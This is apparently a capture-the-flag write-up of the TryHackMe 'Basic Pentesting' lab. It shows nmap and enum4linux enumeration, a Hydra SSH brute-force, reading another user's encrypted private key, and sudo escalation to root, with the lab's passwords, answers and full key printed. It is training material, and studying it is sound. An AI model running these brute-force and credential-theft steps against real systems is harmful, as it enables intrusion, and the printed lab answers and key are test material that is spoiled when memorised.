# Basic Pentesting | TryHackMe

Lab Access: [https://tryhackme.com/room/basicpentestingjt](https://tryhackme.com/room/basicpentestingjt)

Video: [https://www.youtube.com/watch?v=-XGUPin43fc](https://www.youtube.com/watch?v=-XGUPin43fc)

Find the services exposed by the machine

**Enumerate the machine**

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1688280984015/03ac53dc-d871-4688-8082-cc3619b0da0d.png)

Ping to Basic Pentesting Machine VIA OpenVPN

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1688280985342/ac99ae7f-1f7c-4e0a-9286-c337f4b21d41.png)

NMAP

nmap -Pn -A -v 10.10.115.108

Discovered open port 139/tcp on 10.10.115.108  
Discovered open port 8080/tcp on 10.10.115.108  
Discovered open port 445/tcp on 10.10.115.108  
Discovered open port 22/tcp on 10.10.115.108  
Discovered open port 80/tcp on 10.10.115.108  
Discovered open port 8009/tcp on 10.10.115.108

**open ports — Open Service ports**

PORT STATE SERVICE VERSION  
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)  
| ssh-hostkey:   
| 2048 db:45:cb:be:4a:8b:71:f8:e9:31:42:ae:ff:f8:45:e4 (RSA)  
| 256 09:b9:b9:1c:e0:bf:0e:1c:6f:7f:fe:8e:5f:20:1b:ce (ECDSA)  
|\_ 256 a5:68:2b:22:5f:98:4a:62:21:3d:a2:e2:c5:a9:f7:c2 (ED25519)  
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))  
| http-methods:   
|\_ Supported Methods: GET HEAD POST OPTIONS  
|\_http-server-header: Apache/2.4.18 (Ubuntu)  
|\_http-title: Site doesn’t have a title (text/html).  
109/tcp filtered pop2  
139/tcp open netbios-ssn Samba smbd 3.X — 4.X (workgroup: WORKGROUP)  
161/tcp filtered snmp  
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)  
1001/tcp filtered webpush  
1122/tcp filtered availant-mgr  
6059/tcp filtered X11:59  
8009/tcp open ajp13?  
|\_ajp-methods: Failed to get a valid response for the OPTION request  
8080/tcp open http-proxy  
|\_http-favicon: Apache Tomcat  
| http-methods:   
|\_ Supported Methods: POST OPTIONS  
|\_http-title: Apache Tomcat/9.0.7  
9003/tcp filtered unknown  
Service Info: Host: BASIC2; OS: Linux; CPE: cpe:/o:linux:linux\_kernel

Host script results:  
|\_clock-skew: mean: 1h20m02s, deviation: 2h18m36s, median: 1s  
| nbstat: NetBIOS name: BASIC2, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)  
| Names:  
| BASIC2<00> Flags: <unique><active>  
| BASIC2<03> Flags: <unique><active>  
| BASIC2<20> Flags: <unique><active>  
| \\x01\\x02\_\_MSBROWSE\_\_\\x02<01> Flags: <group><active>  
| WORKGROUP<00> Flags: <group><active>  
| WORKGROUP<1d> Flags: <unique><active>  
|\_ WORKGROUP<1e> Flags: <group><active>  
| smb-os-discovery:   
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)  
| Computer name: basic2  
| NetBIOS computer name: BASIC2\\x00  
| Domain name: \\x00  
| FQDN: basic2  
|\_ System time: 2020–05–04T23:34:31–04:00  
| smb-security-mode:   
| account\_used: guest  
| authentication\_level: user  
| challenge\_response: supported  
|\_ message\_signing: disabled (dangerous, but default)  
| smb2-security-mode:   
| 2.02:   
|\_ Message signing enabled but not required  
| smb2-time:   
| date: 2020–05–05T03:34:28  
|\_ start\_date: N/A

**Discover the hidden directory**

What is the name of the hidden directory on the web server(enter name without /)?  
**Tool: DirBuster You can use other tool also**  
[http://10.10.115.108/development/](http://10.10.115.108/development/)

### Information gather and exploit

User brute-forcing to find the username & password

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1688280987777/e5845037-6585-4e23-a3ca-7b0dd9b4a396.png)

enum4linux

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1688280989265/c9f7afa5-2a36-4741-8a21-98473058ca80.png)

Users

kali@kali:~$ enum4linux 10.10.115.108

\[+\] Enumerating users using SID S-1–22–1 and logon username ‘’, password ‘’  
S-1–22–1–1000 Unix User\\kay (Local User)  
S-1–22–1–1001 Unix User\\jan (Local User)

### Brute-force with hydra

#### **Tool: Hydra and Wordlist: rockyou.txt**

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1688280990681/6d0ae4a6-24b0-48af-b7df-d3c73e792448.png)

Tool: Hydra and Wordlist: rockyou.txt

kali@kali:~$ hydra -l jan -P <rockyou.txt directory> 10.10.115.108 ssh

kali@kali:~$ hydra -l jan -P /home/kali/Desktop/TryHackMe//rockyou.txt 10.10.115.108 ssh  
Hydra v9.0 © 2019 by van Hauser/THC — Please do not use in military or secret service organizations, or for illegal purposes.

Hydra ([https://github.com/vanhauser-thc/thc-hydra](https://github.com/vanhauser-thc/thc-hydra)) starting at 2020–05–05 00:30:12  
\[WARNING\] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4  
\[DATA\] max 16 tasks per 1 server, overall 16 tasks, 14344398 login tries (l:1/p:14344398), ~896525 tries per task  
\[DATA\] attacking ssh://10.10.115.108:22/  
\[STATUS\] 182.00 tries/min, 182 tries in 00:01h, 14344222 to do in 1313:35h, 16 active  
\[STATUS\] 119.33 tries/min, 358 tries in 00:03h, 14344046 to do in 2003:22h, 16 active  
**\[22\]\[ssh\] host: 10.10.115.108 login: jan password: armando**  
1 of 1 target successfully completed, 1 valid password found  
\[WARNING\] Writing restore file because 7 final worker threads did not complete until end.  
\[ERROR\] 7 targets did not resolve or could not be connected  
\[ERROR\] 0 targets did not complete  
Hydra ([https://github.com/vanhauser-thc/thc-hydra](https://github.com/vanhauser-thc/thc-hydra)) finished at 2020–05–05 00:37:00

What is the username? Ans: jan  
What is the password? Ans: armando  
What service do you use to access the server(answer in abbreviation in all caps)? Ans: ssh

### Use jan’s login credential

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1688280992333/ce405d88-8e06-47b7-8610-274d6333f01c.png)

SSH access — jan user

Enumerate the machine to find any vectors for privilege escalation   
kali@kali:~$ ssh jan@10.10.115.108  
The authenticity of host ‘10.10.115.108 (10.10.115.108)’ can’t be established.  
ECDSA key fingerprint is SHA256:+Fk53V/LB+2pn4OPL7GN/DuVHVvO0lT9N4W5ifchySQ.  
Are you sure you want to continue connecting (yes/no/\[fingerprint\])? yes  
Warning: Permanently added ‘10.10.115.108’ (ECDSA) to the list of known hosts.  
jan@10.10.115.108’s password:   
Welcome to Ubuntu 16.04.4 LTS (GNU/Linux 4.4.0–119-generic x86\_64)

\* Documentation: [https://help.ubuntu.com](https://help.ubuntu.com)  
 \* Management: [https://landscape.canonical.com](https://landscape.canonical.com)  
 \* Support: [https://ubuntu.com/advantage](https://ubuntu.com/advantage)

0 packages can be updated.  
0 updates are security updates.

The programs included with the Ubuntu system are free software;  
the exact distribution terms for each program are described in the  
individual files in /usr/share/doc/\*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by  
applicable law.

The programs included with the Ubuntu system are free software;  
the exact distribution terms for each program are described in the  
individual files in /usr/share/doc/\*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by  
applicable law.

Last login: Mon Apr 23 15:55:45 2018 from 192.168.56.102

**Privilege escalate**

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1688280993753/5fc32305-5dc7-42ea-8dce-af6568f85567.png)

**Privilege escalate**

jan@basic2:~$ cd /home/jan  
jan@basic2:~$ ls -la  
total 12  
drwxr-xr-x 2 root root 4096 Apr 23 2018 .  
drwxr-xr-x 4 root root 4096 Apr 19 2018 ..  
\-rw — — — — 1 root jan 47 Apr 23 2018 .lesshst  
jan@basic2:~$

What is the name of the other user you found(all lower case)? Ans: kay  
S-1–22–1–1000 Unix User\\kay (Local User)  
jan@basic2:~$ cd /home/kay  
jan@basic2:/home/kay$   
jan@basic2:/home/kay$ ls -la  
total 48  
drwxr-xr-x 5 kay kay 4096 Apr 23 2018 .  
drwxr-xr-x 4 root root 4096 Apr 19 2018 ..  
\-rw — — — — 1 kay kay 756 Apr 23 2018 .bash\_history  
\-rw-r — r — 1 kay kay 220 Apr 17 2018 .bash\_logout  
\-rw-r — r — 1 kay kay 3771 Apr 17 2018 .bashrc  
drwx — — — 2 kay kay 4096 Apr 17 2018 .cache  
\-rw — — — — 1 root kay 119 Apr 23 2018 .lesshst  
drwxrwxr-x 2 kay kay 4096 Apr 23 2018 .nano  
\-rw — — — — 1 kay kay 57 Apr 23 2018 pass.bak  
\-rw-r — r — 1 kay kay 655 Apr 17 2018 .profile  
drwxr-xr-x 2 kay kay 4096 Apr 23 2018 .ssh  
\-rw-r — r — 1 kay kay 0 Apr 17 2018 .sudo\_as\_admin\_successful  
\-rw — — — — 1 root kay 538 Apr 23 2018 .viminfo

jan@basic2:/home/kay$ cd .ssh  
jan@basic2:/home/kay/.ssh$ ls -la  
total 20  
drwxr-xr-x 2 kay kay 4096 Apr 23 2018 .  
drwxr-xr-x 5 kay kay 4096 Apr 23 2018 ..  
\-rw-rw-r — 1 kay kay 771 Apr 23 2018 authorized\_keys  
\-rw-r — r — 1 kay kay 3326 Apr 19 2018 id\_rsa  
\-rw-r — r — 1 kay kay 771 Apr 19 2018 id\_rsa.pub

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1688280995222/8fb3782e-c1c9-4618-8f1b-d363f61b8e9a.png)

cat id\_rsa

jan@basic2:/home/kay/.ssh$ cat id\_rsa  
 — — -BEGIN RSA PRIVATE KEY — — -  
Proc-Type: 4,ENCRYPTED  
DEK-Info: AES-128-CBC,6ABA7DE35CDB65070B92C1F760E2FE75

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  
 — — -END RSA PRIVATE KEY — — -  
jan@basic2:/home/kay/.ssh$

**Kay’s password — beeswax (id\_rsa)**

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1688280997680/6d8e9f3b-579a-45ff-bfe8-de1f7827e4e7.png)

HASH to Password

jan@basic2:/home/kay/.ssh$ ssh -i /home/kay/.ssh/id\_rsa kay@10.10.115.108  
Could not create directory ‘/home/jan/.ssh’.  
The authenticity of host ‘10.10.115.108 (10.10.115.108)’ can’t be established.  
ECDSA key fingerprint is SHA256:+Fk53V/LB+2pn4OPL7GN/DuVHVvO0lT9N4W5ifchySQ.  
Are you sure you want to continue connecting (yes/no)? yes  
Failed to add the host to the list of known hosts (/home/jan/.ssh/known\_hosts).  
Enter passphrase for key ‘/home/kay/.ssh/id\_rsa’:   
Welcome to Ubuntu 16.04.4 LTS (GNU/Linux 4.4.0–119-generic x86\_64)

\* Documentation: [https://help.ubuntu.com](https://help.ubuntu.com)  
 \* Management: [https://landscape.canonical.com](https://landscape.canonical.com)  
 \* Support: [https://ubuntu.com/advantage](https://ubuntu.com/advantage)

0 packages can be updated.  
0 updates are security updates.

Last login: Mon Apr 23 16:04:07 2018 from 192.168.56.102  
kay@basic2:~$ ls  
pass.bak  
kay@basic2:~$ cat pass.bak  
heresareallystrongpasswordthatfollowsthepasswordpolicy$$

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1688281000304/59002909-9c0a-4598-a485-03e9c7d9104b.png)

Pass.Bak — Root Access

Last login: Mon Apr 23 16:04:07 2018 from 192.168.56.102  
kay@basic2:~$ ls  
pass.bak  
kay@basic2:~$ cat pass.bak  
heresareallystrongpasswordthatfollowsthepasswordpolicy$$

kay@basic2:~$ sudo -l  
\[sudo\] password for kay:   
Matching Defaults entries for kay on basic2:  
 env\_reset, mail\_badpass, secure\_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin

User kay may run the following commands on basic2:  
 (ALL : ALL) ALL  
kay@basic2:~$ sudo su  
root@basic2:/home/kay# cd /root  
root@basic2:~#
